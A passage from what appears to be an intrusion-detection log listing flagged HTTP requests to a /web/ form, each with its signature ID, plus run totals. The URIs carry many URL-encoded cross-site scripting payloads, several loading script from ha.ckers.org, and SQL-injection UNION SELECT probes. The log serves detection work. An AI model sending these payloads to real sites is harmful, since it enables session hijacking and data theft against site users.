mespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1715]	Uri [/web/?demo-email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-priority=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-human=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-copy=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&]	Nattacks [1]	Signatures	[2009714]
Packet [1716]	Uri [/web/?demo-email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1717]	Uri [/web/?demo-email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-priority=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-human=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-copy=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1718]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1720]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1731]	Uri [/web/?demo-email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-priority=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-human=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-copy=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1734]	Uri [/web/?demo-email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1740]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1741]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1742]	Uri [/web/?demo-email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1743]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1746]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1749]	Uri [/web/?demo-email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-priority=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-human=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-copy=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1755]	Uri [/web/?demo-email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-priority=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-human=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-copy=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1759]	Uri [/web/?demo-email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1764]	Uri [/web/?demo-email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1772]	Uri [/web/?demo-email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-priority=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-human=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-copy=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1774]	Uri [/web/?demo-email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-priority=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-human=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-copy=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1779]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1783]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1811]	Uri [/web/?demo-email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1812]	Uri [/web/?demo-email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1837]	Uri [/web/?name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1838]	Uri [/web/?name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1863]	Uri [/web/?demo-priority=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1864]	Uri [/web/?demo-priority=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1889]	Uri [/web/?demo-human=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1890]	Uri [/web/?demo-human=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1915]	Uri [/web/?demo-name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1916]	Uri [/web/?demo-name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1941]	Uri [/web/?demo-copy=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1942]	Uri [/web/?demo-copy=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1967]	Uri [/web/?email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [1968]	Uri [/web/?email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
# N. packets [2108], [359] with alerts, N. Alerts [359]
# Execution time: 0.302825 s
